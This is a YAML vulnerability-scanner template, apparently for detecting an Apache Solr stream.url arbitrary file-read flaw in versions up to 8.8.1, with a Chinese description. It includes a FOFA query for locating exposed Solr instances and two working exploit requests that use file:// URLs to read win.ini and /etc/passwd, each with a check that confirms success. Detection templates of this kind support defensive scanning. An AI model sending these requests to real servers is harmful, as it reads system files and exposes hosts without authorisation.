product: Apache-Solr
vName: Apache-Solr stream.url任意文件读取
type: 文件读取
vID: [ ]
level: 3
vDesc: Apache Solr的某些功能存在过滤不严格，在Apache Solr未开启认证的情况下，攻击者可直接构造特定请求开启特定配置，并最终造成SSRF或文件读取漏洞。
version: Apache Solr <= 8.8.1
note: ''
search:
  FOFA: app="APACHE-Solr"
protocol: http
link: https://github.com/tzwlhack/Vulnerability/blob/main/Apache%20Solr%20stream.url任意文件读取漏洞.md
fix: [ ]
model: ''
logic: or
exploit:
  - exp:
      method: post
      follow: false
      path: /solr/caselaw/debug/dump?param=ContentStreams&wt=json
      data: stream.url=file://C:/windows/win.ini
    verify:
      path: ''
      logic: and
      check:
        - body:
            value:
              - for 16-bit app support
            logic: and
  - exp:
      method: post
      follow: false
      path: /solr/caselaw/debug/dump?param=ContentStreams&wt=json
      data: stream.url=file:///etc/passwd
    verify:
      path: ''
      logic: and
      check:
        - body:
            value:
              - 'root:x:0'
            logic: and